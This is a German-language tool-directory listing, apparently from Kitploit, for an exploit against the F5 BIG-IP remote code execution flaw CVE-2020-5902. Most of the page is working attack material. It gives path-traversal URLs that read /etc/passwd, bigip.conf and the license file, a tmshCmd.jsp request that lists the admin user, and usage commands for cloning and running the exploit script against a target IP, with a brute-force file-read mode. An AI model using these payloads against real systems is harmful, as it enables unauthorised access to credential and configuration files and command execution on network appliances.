Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-5902 — Exploit-Code für F5-Big-IP (CVE-2020-5902) | Kitploit
Tools/GitHubGitHub/yasserjanah/cve-2020-5902
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRemote-Access-Tool
GitHubyasserjanah/cve-2020-5902

CVE-2020-5902

Exploit-Code für F5-Big-IP (CVE-2020-5902)

Repository anzeigen
4315vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-5902

Exploit-Code für F5-Big-IP (CVE-2020-5902)

Zusammenfassung

In den BIG-IP-Versionen 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 und 11.6.1-11.6.5.1 weist die Traffic Management User Interface (TMUI), auch als Configuration Utility bezeichnet, eine Remote Code Execution (RCE)-Schwachstelle auf nicht offengelegten Seiten auf.

Proof-of-Concept

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Verwendung

root@kitploit:~
$ git clone https://github.com/yasserjanah/CVE-2020-5902
root@kitploit:~
$ cd CVE-2020-5902/
root@kitploit:~
$ pip3 install -r ./requirements.txt
root@kitploit:~
$ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd

-b, um Dateien aus einer Wortliste per Brute-Force zu durchsuchen

root@kitploit:~
$ python3 exploit-CVE-2020-5902.py -ip <IP> -b
Tool herunterladen